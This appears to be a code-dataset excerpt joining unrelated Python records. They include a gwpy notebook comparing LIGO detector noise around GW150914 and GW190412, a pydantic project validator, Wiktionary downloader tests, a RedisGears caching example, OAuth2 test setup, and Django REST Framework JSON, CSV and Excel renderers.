# and plot using standard colours
ax.plot(hasd2, label='LIGO-Hanford', color='gwpy:ligo-hanford')
# update the Livingston line to use standard colour, and have a label
lline = ax.lines[0]
lline.set_color('gwpy:ligo-livingston') # change colour of Livingston data
lline.set_label('LIGO-Livingston')
ax.set_ylabel(r'Strain noise [$1/\sqrt{\mathrm{Hz}}$]')
ax.legend()
plot
# Now we can see clearly the relative sensitivity of each LIGO instrument, the common features between both, and those unique to each observatory.
# # Challenges:
# ##### Quiz Question 1:
#
# The peak amplitude in the LIGO-Livingston data occurs at approximately 5 seconds into the plot above and is undetectable above the background noise by the eye. Plot the data for the LIGO-Hanford detector around GW150914. Looking at your new LIGO-Hanford plot, can your eye identify a signal peak?
# In[14]:
from gwosc.datasets import event_gps
gps1 = event_gps('GW150914')
print(gps1)
segment1 = (int(gps)-7, int(gps)+7)
print(segment1)
from gwpy.timeseries import TimeSeries
ldata1 = TimeSeries.fetch_open_data('L1', *segment1, verbose=True)
print(ldata1)
get_ipython().run_line_magic('matplotlib', 'inline')
plot1 = ldata1.plot()
# In[24]:
import matplotlib.pyplot as plt
ldata2 = TimeSeries.fetch_open_data('L1', int(gps)-512, int(gps)+512, cache=True)
lasd2 = ldata2.asd(fftlength=4, method="median")
# get Hanford data
hdata2 = TimeSeries.fetch_open_data('H1', int(gps)-512, int(gps)+512, cache=True)
hasd2 = hdata2.asd(fftlength=4, method="median")
fig, ax = plt.subplots(figsize=(13,7))
# and plot using standard colours
ax.plot(hasd2, label='LIGO-Hanford', color='gwpy:ligo-hanford')
ax.plot(lasd2, label='LIGO-Livingston', color='gwpy:ligo-livingston')
ax.set_xlim(2, 1400)
ax.set_ylim(5e-24, 2e-19)
# update the Livingston line to use standard colour, and have a label
ax.set_yscale('log')
ax.set_xscale('log')
ax.set_ylabel(r'Strain noise [$1/\sqrt{\mathrm{Hz}}$]')
ax.set_xlabel(r'Frequency [Hz]')
ax.legend()
plt.show()
# # Quiz Question 2 :
#
# Make an ASD around the time of an O3 event, GW190412 for L1 detector . Compare this with the ASDs around GW150914 for L1 detector. Which data have lower noise - and so are more sensitive - around 100 Hz?
#
# In[25]:
from gwosc.datasets import event_gps
gps_GW190412 = event_gps('GW190412')
print(gps_GW190412)
segment_GW190412 = (int(gps_GW190412)-7, int(gps_GW190412)+7)
print(segment_GW190412)
from gwpy.timeseries import TimeSeries
ldata_GW190412 = TimeSeries.fetch_open_data('L1', *segment_GW190412, verbose=True)
print(ldata_GW190412)
get_ipython().run_line_magic('matplotlib', 'inline')
plot_GW190412 = ldata_GW190412.plot()
# In[32]:
import matplotlib.pyplot as plt
ldata_GW190412 = TimeSeries.fetch_open_data('L1', int(gps_GW190412)-512, int(gps_GW190412)+512, cache=True)
lasd_GW190412 = ldata_GW190412.asd(fftlength=4, method="median")
# get Hanford data
hdata_GW190412 = TimeSeries.fetch_open_data('H1', int(gps_GW190412)-512, int(gps_GW190412)+512, cache=True)
hasd_GW190412 = hdata_GW190412.asd(fftlength=4, method="median")
fig, ax = plt.subplots(figsize=(13,7))
# and plot using standard colours
ax.plot(hasd_GW190412, label='LIGO-Hanford', color='gwpy:ligo-hanford')
ax.plot(lasd_GW190412, label='LIGO-Livingston', color='gwpy:ligo-livingston')
ax.set_xlim(2, 1400)
ax.set_ylim(4e-24, 7e-19)
# update the Livingston line to use standard colour, and have a label
ax.set_yscale('log')
ax.set_xscale('log')
ax.set_ylabel(r'Strain noise [$1/\sqrt{\mathrm{Hz}}$]')
ax.set_xlabel(r'Frequency [Hz]')
ax.legend()
plt.show()
# In[33]:
import matplotlib.pyplot as plt
ldata_GW190412 = TimeSeries.fetch_open_data('L1', int(gps_GW190412)-512, int(gps_GW190412)+512, cache=True)
lasd_GW190412 = ldata_GW190412.asd(fftlength=4, method="median")
ldata2 = TimeSeries.fetch_open_data('L1', int(gps)-512, int(gps)+512, cache=True)
lasd2 = ldata2.asd(fftlength=4, method="median")
fig, ax = plt.subplots(figsize=(13,7))
# and plot using standard colours
ax.plot(lasd2, label='LIGO-L1-GW150914', color='blue')
ax.plot(lasd_GW190412, label='LIGO-L1-GW190412', color='green')
ax.set_xlim(2, 1400)
ax.set_ylim(4e-24, 7e-19)
# update the Livingston line to use standard colour, and have a label
ax.set_yscale('log')
ax.set_xscale('log')
ax.set_ylabel(r'Strain noise [$1/\sqrt{\mathrm{Hz}}$]')
ax.set_xlabel(r'Frequency [Hz]')
ax.legend()
plt.show()
# # The GW190412 data has less noise around 100 Hz
# In[ ]:
|
StarcoderdataPython
|
197478
|
<reponame>AdamCottrill/FishNetPortal
from datetime import date
from typing import Optional
from pydantic import validator, constr
from .utils import to_titlecase, yr_to_year
from .FNBase import FNBase, prj_cd_regex
class FN011(FNBase):
"""parser/validator for FN011 objects:
+ Valid project code.
+ Year must be consistent with project code
+ slug is lowercase prj_cd
+ prj_date0 must be constistent with prj_cd
+ prj_date1 must be constistent with prj_cd and occur on or after prj_date0
"""
lake_id: int
protocol_id: int
prj_ldr_id: int
slug: str
prj_cd: constr(regex=prj_cd_regex)
year: int
prj_nm: str
prj_date0: date
prj_date1: date
comment0: Optional[str]
_prj_nm_titlecase = validator("prj_nm", allow_reuse=True)(to_titlecase)
@validator("year")
def check_year_with_prj_cd(cls, v, values):
prj_cd_yr = yr_to_year(values.get("prj_cd", "")[6:8])
if int(prj_cd_yr) != v:
prj_cd = values.get("prj_cd")
err_msg = f"""{prj_cd}: Year ({v}) is not consistent with prj_cd year ({prj_cd_yr})."""
raise ValueError(err_msg)
return v
@validator("prj_date0")
@classmethod
def prj_date0_matches_prj_cd(cls, v, values):
prj_cd_yr = yr_to_year(values.get("prj_cd", "")[6:8])
date_yr = str(v.year)
if prj_cd_yr != date_yr:
prj_cd = values.get("prj_cd")
err_msg = f"""{prj_cd}: Year of start date (prj_date0={v}) is not consistent with prj_cd ({prj_cd_yr})."""
raise ValueError(err_msg)
return v
@validator("prj_date1")
def prj_date0_before_prj_date1(cls, v, values):
if values.get("prj_date0") > v:
raise ValueError(
"Project end date (prj_date1) occurs before start date(prj_date0)."
)
return v
@validator("prj_date1")
@classmethod
def prj_date1_matches_prj_cd(cls, v, values):
prj_cd_yr = yr_to_year(values.get("prj_cd", "")[6:8])
date_yr = str(v.year)
if prj_cd_yr != date_yr:
prj_cd = values.get("prj_cd")
err_msg = f"""{prj_cd}: Year of end date (prj_date1={v}) is not consistent with prj_cd ({prj_cd_yr})."""
raise ValueError(err_msg)
return v
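# Hedged usage sketch (illustrative values): the project code below assumes a
# FishNet-style "ABC_XX21_123" code whose characters [6:8] carry the two-digit
# year; the exact accepted pattern is whatever prj_cd_regex allows, so adjust
# the code if validation rejects it.
def _demo_fn011():
    return FN011(
        lake_id=1,
        protocol_id=1,
        prj_ldr_id=1,
        slug="lha_ia21_123",
        prj_cd="LHA_IA21_123",
        year=2021,
        prj_nm="example netting project",
        prj_date0=date(2021, 6, 1),
        prj_date1=date(2021, 6, 30),
    )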
|
StarcoderdataPython
|
3270414
|
from django.urls import include, path
from .views import DepartmentViewSet, PersonViewSet
from .routers import CustomDefaultRouter
router = CustomDefaultRouter()
router.register(r'department', DepartmentViewSet, basename='department')
router.register(r'people', PersonViewSet, basename='person')
urlpatterns = (
path('api/', include(router.urls)),
)
|
StarcoderdataPython
|
3394130
|
import os
from pathlib import Path
import responses
from wikidict import download
from wikidict.constants import BASE_URL, DUMP_URL
WIKTIONARY_INDEX = """<html>
<head><title>Index of /frwiktionary/</title></head>
<body bgcolor="white">
<h1>Index of /frwiktionary/</h1><hr><pre><a href="../">../</a>
<a href="20191120/">20191120/</a> 02-Jan-2020 01:29 -
<a href="20191201/">20191201/</a> 21-Jan-2020 01:36 -
<a href="20191220/">20191220/</a> 02-Feb-2020 01:28 -
<a href="20200101/">20200101/</a> 21-Feb-2020 01:38 -
<a href="20200120/">20200120/</a> 02-Mar-2020 01:28 -
<a href="20200201/">20200201/</a> 02-Apr-2020 01:36 -
<a href="20200220/">20200220/</a> 24-Feb-2020 17:32 -
<a href="20200301/">20200301/</a> 09-Mar-2020 03:42 -
<a href="{date}/">{date}/</a> 17-Apr-2020 15:20 -
<a href="latest/">latest/</a> 17-Apr-2020 15:20 -
</pre><hr></body>
</html>
"""
@responses.activate
def test_simple(craft_data):
"""It should download the Wiktionary dump file and extract it."""
output_dir = Path(os.environ["CWD"]) / "data" / "fr"
date = "20200417"
pages_xml = output_dir / f"pages-{date}.xml"
pages_bz2 = output_dir / f"pages-{date}.xml.bz2"
# Clean-up before we start
for file in (pages_xml, pages_bz2):
file.unlink(missing_ok=True)
# List of requests responses to falsify:
# - fetch_snapshots()
# - fetch_pages()
responses.add(
responses.GET,
BASE_URL.format("fr"),
body=WIKTIONARY_INDEX.format(date=date),
)
responses.add(
responses.GET,
DUMP_URL.format("fr", date),
body=craft_data(date, "fr"),
)
# Start the whole process
assert download.main("fr") == 0
# Check that files are created
assert pages_xml.is_file()
assert pages_bz2.is_file()
@responses.activate
def test_download_already_done(craft_data):
"""It should not download again a processed Wiktionary dump."""
output_dir = Path(os.environ["CWD"]) / "data" / "fr"
date = "20200417"
pages_xml = output_dir / f"pages-{date}.xml"
pages_bz2 = output_dir / f"pages-{date}.xml.bz2"
# The BZ2 file was already downloaded
pages_bz2.write_bytes(craft_data(date, "fr"))
# List of requests responses to falsify:
# - fetch_snapshots()
responses.add(
responses.GET,
BASE_URL.format("fr"),
body=WIKTIONARY_INDEX.format(date=date),
)
# Start the whole process
assert download.main("fr") == 0
# Check that files are created
assert pages_xml.is_file()
assert pages_bz2.is_file()
@responses.activate
def test_ongoing_dump(craft_data, capsys):
"""When the dump is not finished on the Wiktionary side, the previous dump should be used."""
output_dir = Path(os.environ["CWD"]) / "data" / "fr"
# Clean-up before we start
for date in ("20200301", "20200514"):
(output_dir / f"pages-{date}.xml").unlink(missing_ok=True)
(output_dir / f"pages-{date}.xml.bz2").unlink(missing_ok=True)
# List of requests responses to falsify:
# - fetch_snapshots()
# - fetch_pages() for 20200514
# - fetch_pages() for 20200301
responses.add(
responses.GET,
BASE_URL.format("fr"),
body=WIKTIONARY_INDEX.format(date="20200514"),
)
responses.add(
responses.GET,
DUMP_URL.format("fr", "20200514"),
status=404,
)
responses.add(
responses.GET,
DUMP_URL.format("fr", "20200301"),
body=craft_data("20200301", "fr"),
)
# Start the whole process
assert download.main("fr") == 0
# Check that files are created
assert (output_dir / "pages-20200301.xml").is_file()
assert (output_dir / "pages-20200301.xml.bz2").is_file()
# Check that files are not created
assert not (output_dir / "pages-20200514.xml").is_file()
assert not (output_dir / "pages-20200514.xml.bz2").is_file()
def test_progress_callback_normal(capsys):
download.callback_progress("Some text: ", 42 * 1024, False)
captured = capsys.readouterr()
assert captured.out == "\rSome text: 43,008 bytes"
download.callback_progress("Some text: ", 42 * 1024, True)
captured = capsys.readouterr()
assert captured.out == "\rSome text: OK [43,008 bytes]\n"
def test_progress_callback_ci(capsys):
download.callback_progress_ci("Some text: ", 42 * 1024, False)
captured = capsys.readouterr()
assert captured.out == "."
download.callback_progress_ci("Some text: ", 42 * 1024, True)
captured = capsys.readouterr()
assert captured.out == ". OK [43,008 bytes]\n"
|
StarcoderdataPython
|
1770517
|
<filename>myo-sensor-data-analysis/Radar plots/real_time_refactored.py<gh_stars>0
import myo
class Listener(myo.DeviceListener):
def on_paired(self, event):
print("Hello, {}!".format(event.device_name))
event.device.vibrate(myo.VibrationType.short)
def on_unpaired(self, event):
return False # Stop the hub
def on_orientation(self, event):
orientation = event.orientation
acceleration = event.acceleration
gyroscope = event.gyroscope
# ... do something with that
def on_pose(self, pose):
pass
if __name__ == '__main__':
myo.init(sdk_path='/Users/harvinderpower/GitHub/ichealthhack18/myo-sensor-data-analysis/sdk/')
hub = myo.Hub()
listener = Listener()
while hub.run(listener.on_event, 500):
pass
|
StarcoderdataPython
|
93139
|
import datetime
import timeit
import redgrease
# Bind / register the function on some Redis instance.
r = redgrease.RedisGears()
# CommandReader Decorator
# The `command` decorator tunrs the function to a CommandReader,
# registerered on the Redis Gears sever if using the `on` argument
@redgrease.command(on=r, requirements=["requests"], replace=False)
def cache_get(url):
import requests
# Check if the url is already in the cache,
# And if so, simply return the cached result.
if redgrease.cmd.exists(url):
return bytes(redgrease.cmd.get(url))
# Otherwise fetch the url.
response = requests.get(url)
# Return nothing if request fails
if response.status_code != 200:
return bytes()
# If ok, set the cache data and return.
response_data = bytes(response.content)
redgrease.cmd.set(url, response_data)
return response_data
# Test caching on some images
some_image_urls = [
"http://images.cocodataset.org/train2017/000000483381.jpg",
"http://images.cocodataset.org/train2017/000000237137.jpg",
"http://images.cocodataset.org/train2017/000000017267.jpg",
"http://images.cocodataset.org/train2017/000000197756.jpg",
"http://images.cocodataset.org/train2017/000000193332.jpg",
"http://images.cocodataset.org/train2017/000000475564.jpg",
"http://images.cocodataset.org/train2017/000000247368.jpg",
"http://images.cocodataset.org/train2017/000000416337.jpg",
]
# Get all the images and write them to disk
def get_em_all():
for image_url in some_image_urls:
# This will invoke the cache_get function **on the Redis server**
image_data = cache_get(image_url)
# Quick and dirty way of getting the image file name.
image_name = image_url.split("/")[-1]
# Write to file
with open(image_name, "wb") as img_file:
img_file.write(image_data.value)
# Test it
# Time how long it takes to get images when the cache is empty.
t1 = timeit.timeit(get_em_all, number=1)
print(f"Cache-miss time: {t1:.3f} seconds")
# Time how long it takes to get the images when they are all in the cache.
t2 = timeit.timeit(get_em_all, number=1)
print(f"Cache-hit time: {t2:.3f} seconds")
print(f"That is {t1/t2:.1f} times faster!")
# Clean the database
def cleanup(r: redgrease.RedisGears):
# Unregister all registrations
for reg in r.gears.dumpregistrations():
r.gears.unregister(reg.id)
# Remove all executions
for exe in r.gears.dumpexecutions():
r.gears.dropexecution(str(exe.executionId))
# Clear all keys
r.flushall()
# Check that there are no keys
return len(r.keys()) == 0
# print(cleanup(r))
|
StarcoderdataPython
|
32839
|
<reponame>fgmacedo/django-awards
from celery.task import Task
from ..notifications.contextmanagers import BatchNotifications
class AsyncBadgeAward(Task):
ignore_result = True
def run(self, badge, state, **kwargs):
# from celery.contrib import rdb; rdb.set_trace()
with BatchNotifications():
badge.actually_possibly_award(**state)
|
StarcoderdataPython
|
3268443
|
#Program to find non-repeated element
arr=list(map(int, input().split(', '))) #Input various integers in arr list
if 1< len(arr) <= 10**6: #Checking array length
for i in arr: #Taking element from arr
if 0 < i <= 10**9: #Checking element value
            if arr.count(i) == 1:  # Checking whether the number is unique
print(i) #Printing element
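# Added sketch (not part of the original exercise): collections.Counter computes
# every frequency in a single pass, avoiding the O(n^2) cost of calling
# arr.count(i) inside the loop. Defined only; the original logic above is kept.
def print_unique_elements(values):
    from collections import Counter
    counts = Counter(values)            # value -> number of occurrences
    for value in values:
        if counts[value] == 1:          # keep only non-repeated elements
            print(value)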
|
StarcoderdataPython
|
3399901
|
<reponame>rjczanik/xzceb-flask_eng_fr<filename>final_project/machinetranslation/tests/tests.py<gh_stars>0
import unittest
from translator import *
class TestEngToFrText(unittest.TestCase):
def test_null_value(self):
self.assertEqual(
english_to_french(None), "Please enter some text to translate..."
)
    def test_valid_argument(self):
self.assertEqual(english_to_french("Hello"), "Bonjour")
class TestFrToEngText(unittest.TestCase):
def test_null_value(self):
self.assertEqual(
french_to_english(None), "Please enter some text to translate..."
)
    def test_valid_argument(self):
        self.assertEqual(french_to_english("Bonjour"), "Hello")
if __name__ == "__main__":
unittest.main()
|
StarcoderdataPython
|
3373183
|
<reponame>minddistrict/authlib
import os
import base64
import unittest
from flask import Flask, request
from authlib.common.security import generate_token
from authlib.common.encoding import to_bytes, to_unicode
from authlib.common.urls import url_encode
from authlib.integrations.sqla_oauth2 import (
create_query_client_func,
create_save_token_func,
)
from authlib.integrations.flask_oauth2 import AuthorizationServer
from authlib.oauth2 import OAuth2Error
from .models import db, User, Client, Token
def token_generator(client, grant_type, user=None, scope=None):
token = '{}-{}'.format(client.client_id[0], grant_type)
if user:
token = '{}.{}'.format(token, user.get_user_id())
return '{}.{}'.format(token, generate_token(32))
def create_authorization_server(app, lazy=False):
query_client = create_query_client_func(db.session, Client)
save_token = create_save_token_func(db.session, Token)
if lazy:
server = AuthorizationServer()
server.init_app(app, query_client, save_token)
else:
server = AuthorizationServer(app, query_client, save_token)
@app.route('/oauth/authorize', methods=['GET', 'POST'])
def authorize():
if request.method == 'GET':
user_id = request.args.get('user_id')
if user_id:
end_user = User.query.get(int(user_id))
else:
end_user = None
try:
grant = server.get_consent_grant(end_user=end_user)
return grant.prompt or 'ok'
except OAuth2Error as error:
return url_encode(error.get_body())
user_id = request.form.get('user_id')
if user_id:
grant_user = User.query.get(int(user_id))
else:
grant_user = None
return server.create_authorization_response(grant_user=grant_user)
@app.route('/oauth/token', methods=['GET', 'POST'])
def issue_token():
return server.create_token_response()
return server
def create_flask_app():
app = Flask(__name__)
app.debug = True
app.testing = True
app.secret_key = 'testing'
app.config.update({
'SQLALCHEMY_TRACK_MODIFICATIONS': False,
'SQLALCHEMY_DATABASE_URI': 'sqlite://',
'OAUTH2_ERROR_URIS': [
('invalid_client', 'https://a.b/e#invalid_client')
]
})
return app
class TestCase(unittest.TestCase):
def setUp(self):
os.environ['AUTHLIB_INSECURE_TRANSPORT'] = 'true'
app = create_flask_app()
self._ctx = app.app_context()
self._ctx.push()
db.init_app(app)
db.create_all()
self.app = app
self.client = app.test_client()
def tearDown(self):
db.drop_all()
self._ctx.pop()
os.environ.pop('AUTHLIB_INSECURE_TRANSPORT')
def create_basic_header(self, username, password):
text = '{}:{}'.format(username, password)
auth = to_unicode(base64.b64encode(to_bytes(text)))
return {'Authorization': 'Basic ' + auth}
|
StarcoderdataPython
|
3230900
|
<reponame>kishorekolli/deep_racer_guru
#
# DeepRacer Guru
#
# Version 3.0 onwards
#
# Copyright (c) 2021 dmh23
#
import math
def get_pretty_small_float(number, max_value, decimal_places):
assert 0 <= decimal_places <= 1
if max_value >= 10 and abs(round(number, decimal_places)) < 10:
prepend = " "
else:
prepend = ""
full_str = prepend + str(round(number, decimal_places))
if full_str.count(".") == 1 and decimal_places == 0:
return full_str[0:-2]
elif full_str.endswith(".0") and decimal_places == 1:
return full_str[0:-2] + " "
elif full_str.count(".") == 0 and decimal_places == 1:
return full_str + " "
else:
return full_str
def get_pretty_large_integer(number):
return "{:,}".format(round(number))
def get_pretty_hours_and_minutes(minutes: int):
show_hours = math.floor(minutes / 60)
show_mins = minutes - show_hours * 60
if show_hours < 10:
formatted_hours = "0" + str(show_hours)
else:
formatted_hours = str(show_hours)
if show_mins < 10:
formatted_mins = "0" + str(show_mins)
else:
formatted_mins = str(show_mins)
return formatted_hours + " : " + formatted_mins
def get_pretty_large_float(number):
return "{:,}".format(number)
def get_pretty_whole_percentage(number):
return str(round(number)) + " %"
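# Usage sketch added for illustration; the sample values are arbitrary and the
# expected results follow directly from the functions above.
if __name__ == "__main__":
    print(get_pretty_large_integer(1234567.8))    # -> 1,234,568
    print(get_pretty_whole_percentage(66.4))      # -> 66 %
    print(get_pretty_hours_and_minutes(135))      # -> 02 : 15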
|
StarcoderdataPython
|
1675680
|
<gh_stars>1-10
import os
from setuptools import setup
with open('requirements.txt') as f:
required = f.read().splitlines()
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="cronio",
version="1.2.0",
author="<NAME>",
author_email="<EMAIL>",
description="This project has a sender and a receiver, the sender sends commands through RabbitMQ on the queue of a worker (receiver), the receiver executes them either with OS or Python2.7",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/nvalerkos/cronio",
install_requires = required,
packages=setuptools.find_packages(),
classifiers=(
"Programming Language :: Python :: 2",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
),
)
|
StarcoderdataPython
|
3266391
|
<reponame>anyidea/drfexts<gh_stars>1-10
import functools
import operator
from decimal import Decimal
import orjson
from typing import Optional, Any
import unicodecsv as csv
from io import BytesIO
import datetime
from django.conf import settings
from openpyxl import Workbook
from openpyxl.styles import Font, PatternFill, Alignment
from rest_framework import status
from django.utils.encoding import force_str
from rest_framework.settings import api_settings
from rest_framework.renderers import BaseRenderer
from rest_framework.status import is_success
from django.utils.functional import Promise
from django.db.models.query import QuerySet
__all__ = ["CustomJSONRenderer", "CustomCSVRenderer", "CustomExcelRenderer"]
class CustomJSONRenderer(BaseRenderer):
"""
Renderer which serializes to JSON.
Uses the Rust-backed orjson library for serialization speed.
"""
media_type = "application/json"
html_media_type = "text/html"
format = "json"
charset = None
options = functools.reduce(
operator.or_,
api_settings.user_settings.get("ORJSON_RENDERER_OPTIONS", ()),
orjson.OPT_SERIALIZE_NUMPY | orjson.OPT_PASSTHROUGH_DATETIME,
)
@staticmethod
def default(obj: Any) -> Any:
"""
When orjson doesn't recognize an object type for serialization it passes
that object to this function which then converts the object to its
native Python equivalent.
:param obj: Object of any type to be converted.
:return: native python object
"""
if isinstance(obj, Promise):
return force_str(obj)
elif isinstance(obj, datetime.datetime):
return obj.strftime(api_settings.DATETIME_FORMAT)
elif isinstance(obj, Decimal):
if api_settings.COERCE_DECIMAL_TO_STRING:
return str(obj)
else:
return float(obj)
elif isinstance(obj, QuerySet):
return tuple(obj)
elif hasattr(obj, "tolist"):
return obj.tolist()
elif hasattr(obj, "__iter__"):
return list(item for item in obj)
def render(
self,
data: Any,
media_type: Optional[str] = None,
renderer_context: Any = None,
) -> bytes:
"""
Serializes Python objects to JSON.
:param data: The response data, as set by the Response() instantiation.
:param media_type: If provided, this is the accepted media type, of the
`Accept` HTTP header.
:param renderer_context: If provided, this is a dictionary of contextual
information provided by the view. By default this will include
the following keys: view, request, response, args, kwargs
:return: bytes() representation of the data encoded to UTF-8
"""
if response := renderer_context.get('response'):
status_code = getattr(response, 'error_code', response.status_code)
response.status_code = status.HTTP_200_OK
playload = {
"ret": status_code,
"msg": "success",
}
if data is not None:
playload["data"] = data
if not is_success(status_code):
try:
playload["msg"] = data["detail"]
playload.pop("data", None)
except Exception:
playload["msg"] = "error"
else:
playload["ret"] = status.HTTP_200_OK
elif data is None:
return b""
else:
playload = data
# If `indent` is provided in the context, then pretty print the result.
# E.g. If we're being called by RestFramework's BrowsableAPIRenderer.
options = self.options
if media_type == self.html_media_type:
options |= orjson.OPT_INDENT_2
serialized: bytes = orjson.dumps(playload, default=self.default, option=options)
return serialized
class BaseExportRenderer(BaseRenderer):
def validate(self, data: dict):
return True
def get_export_data(self, data: dict):
return data["results"] if "results" in data else data
def get_file_name(self, renderer_context: Optional[dict]):
return f'export({datetime.datetime.now().strftime("%Y%m%d")})'
def tablize(self, data, header=None, labels=None, value_mapping=None):
"""
Convert a list of data into a table.
If there is a header provided to tablize it will efficiently yield each
row as needed. If no header is provided, tablize will need to process
each row in the data in order to construct a complete header. Thus, if
you have a lot of data and want to stream it, you should probably
provide a header to the renderer (using the `header` attribute, or via
the `renderer_context`).
"""
# Try to pull the header off of the data, if it's not passed in as an
# argument.
if not header and hasattr(data, 'header'):
header = data.header
if data:
# First, flatten the data (i.e., convert it to a list of
# dictionaries that are each exactly one level deep). The key for
# each item designates the name of the column that the item will
# fall into.
data = self.flatten_data(data)
# Get the set of all unique headers, and sort them (unless already provided).
if not header:
# We don't have to materialize the data generator unless we
# have to build a header.
data = tuple(data)
header_fields = set()
for item in data:
header_fields.update(list(item.keys()))
header = sorted(header_fields)
# Return your "table", with the headers as the first row.
if labels:
yield [labels.get(x, x) for x in header]
else:
yield header
# Create a row for each dictionary, filling in columns for which the
# item has no data with None values.
for item in data:
if value_mapping:
row = [
value_mapping[key].get(item.get(key), item.get(key)) if key in value_mapping else item.get(key)
for key in header
]
else:
row = [item.get(key) for key in header]
yield row
elif header:
# If there's no data but a header was supplied, yield the header.
if labels:
yield [labels.get(x, x) for x in header]
else:
yield header
else:
# Generator will yield nothing if there's no data and no header
pass
def flatten_data(self, data, value_mapping=None):
"""
Convert the given data collection to a list of dictionaries that are
each exactly one level deep. The key for each value in the dictionaries
designates the name of the column that the value will fall into.
"""
for item in data:
yield dict(item)
class CustomCSVRenderer(BaseExportRenderer):
"""
Renderer which serializes to CSV
"""
media_type = 'text/csv'
format = 'csv'
header = None
labels = None # {'<field>':'<label>'}
writer_opts = None
data_key = "results"
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
Renders serialized *data* into CSV. For a dictionary:
"""
renderer_context = renderer_context or {}
if data is None:
return bytes()
if isinstance(data, dict):
data = data[self.data_key]
writer_opts = renderer_context.get('writer_opts', self.writer_opts or {})
header = renderer_context.get('header', self.header)
labels = renderer_context.get('labels', self.labels)
value_mapping = renderer_context.get('value_mapping')
encoding = renderer_context.get('encoding', settings.DEFAULT_CHARSET)
table = self.tablize(data, header=header, labels=labels, value_mapping=value_mapping)
csv_buffer = BytesIO()
csv_writer = csv.writer(csv_buffer, encoding=encoding, **writer_opts)
for row in table:
csv_writer.writerow(row)
filename = self.get_file_name(renderer_context)
renderer_context["response"]['Content-Disposition'] = f'attachment; filename="{filename}.csv"'
return csv_buffer.getvalue()
class CustomExcelRenderer(BaseExportRenderer):
"""
Renderer for Excel spreadsheet open data format (xlsx).
"""
media_type = "application/xlsx"
format = "xlsx"
header = None
labels = None # {'<field>':'<label>'}
boolean_labels = None
custom_mappings = None
letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
data_key = "results"
header_font = Font(b=True)
header_fill = PatternFill('solid', start_color="87CEFA")
header_height = 17
freeze_header = True
def excel_style(self, row, col):
"""Convert given row and column number to an Excel-style cell name."""
result = []
while col:
col, rem = divmod(col - 1, 26)
result[:0] = self.letters[rem]
return ''.join(result) + str(row)
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
Render `data` into XLSX workbook, returning a workbook.
"""
if not self.validate(data):
return bytes()
if isinstance(data, dict):
data = data[self.data_key]
header = renderer_context.get('header', self.header)
labels = renderer_context.get('labels', self.labels)
value_mapping = renderer_context.get('value_mapping')
table = self.tablize(data, header=header, labels=labels, value_mapping=value_mapping)
excel_buffer = BytesIO()
workbook = Workbook()
sheet = workbook.active
for row in table:
sheet.append(row)
for cell in sheet["1:1"]:
cell.font = self.header_font
cell.fill = self.header_fill
cell.alignment = Alignment(vertical='center')
sheet.row_dimensions[1].height = self.header_height
if self.freeze_header:
sheet.freeze_panes = f"A2"
sheet.print_title_rows = '1:1'
workbook.save(excel_buffer)
filename = self.get_file_name(renderer_context)
renderer_context["response"]['Content-Disposition'] = f'attachment; filename="{filename}.xlsx"'
return excel_buffer.getvalue()
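# Usage sketch (illustration only, not part of the original module). The view,
# queryset and serializer names are hypothetical; renderer_classes and
# get_renderer_context() are standard DRF hooks used to plug in the renderers
# defined above and to pass the header/labels context they read.
#
# from rest_framework import generics
#
# class UserExportView(generics.ListAPIView):
#     queryset = User.objects.all()
#     serializer_class = UserSerializer
#     renderer_classes = [CustomJSONRenderer, CustomCSVRenderer, CustomExcelRenderer]
#
#     def get_renderer_context(self):
#         context = super().get_renderer_context()
#         context["header"] = ["username", "email"]                      # column order
#         context["labels"] = {"username": "User", "email": "E-mail"}    # header labels
#         return context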
|
StarcoderdataPython
|
1716843
|
<filename>Lesson 02/Solutions/Solution02.py<gh_stars>0
# String Repeat
#
# Get two inputs from the user
# 1. The number of times to repeat
# 2. The string to repeat
numRepeat = int(input("Enter the number of times to repeat: "))
stringRepeat = input("Enter the string to repeat: ")
# Solution 1:
for i in range(numRepeat):
print(stringRepeat, end="")
# Solution 2
res = ""
for i in range(numRepeat):
res += stringRepeat
print(res)
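# Solution 3 (added sketch): Python's sequence repetition does the same in one step
print(stringRepeat * numRepeat)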
|
StarcoderdataPython
|
81884
|
<filename>043_face_landmark/lib/helper/init.py
import tensorflow as tf
def init(*args):
if len(args)==1:
use_pb=True
pb_path=args[0]
else:
use_pb=False
meta_path=args[0]
restore_model_path=args[1]
def ini_ckpt():
graph = tf.Graph()
graph.as_default()
configProto = tf.ConfigProto()
configProto.gpu_options.allow_growth = True
sess = tf.Session(config=configProto)
#load_model(model_path, sess)
saver = tf.train.import_meta_graph(meta_path)
saver.restore(sess, restore_model_path)
print("Model restred!")
return (graph, sess)
def init_pb(model_path):
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.2
compute_graph = tf.Graph()
compute_graph.as_default()
sess = tf.Session(config=config)
with tf.gfile.GFile(model_path, 'rb') as fid:
graph_def = tf.GraphDef()
graph_def.ParseFromString(fid.read())
tf.import_graph_def(graph_def, name='')
# saver = tf.train.Saver(tf.global_variables())
# saver.save(sess, save_path='./tmp.ckpt')
return (compute_graph, sess)
if use_pb:
model = init_pb(pb_path)
else:
model = ini_ckpt()
graph = model[0]
sess = model[1]
return graph,sess
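# Usage sketch (illustrative; the file paths below are placeholders, not from
# the original project). One positional argument loads a frozen graph (.pb);
# two arguments load a meta graph plus its checkpoint.
#
#   graph, sess = init('model.pb')
#   graph, sess = init('model.meta', 'model.ckpt')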
|
StarcoderdataPython
|
1684823
|
import requests
import time
import json
import pdb
import random
import optparse
import threading
import sys
import os
def jsonPrint(r):
"""Pretty-print JSON"""
return json.dumps(r.json(), indent=4, sort_keys=True) + "\n"
def ordered(obj):
"""Order map for comparison
https://stackoverflow.com/questions/25851183/
"""
if isinstance(obj, dict):
return sorted((k, ordered(v)) for k, v in obj.items())
if isinstance(obj, list):
return sorted(ordered(x) for x in obj)
else:
return obj
def HTTPpost(endpoint, page, jsonArg="{}"):
"""Make HTTP post"""
return requests.post('http://{ip}:{port}/{page}'.format(
ip=endpoint["IP"], port=endpoint["HTTPPort"], page=page), json=jsonArg)
threads = []
def HTTPpostAsync(endpoint, page, jsonArg="{}"):
thread = threading.Thread(target=HTTPpost, args=(endpoint, page, jsonArg))
thread.start()
threads.append(thread)
# Will act as controlling node if used
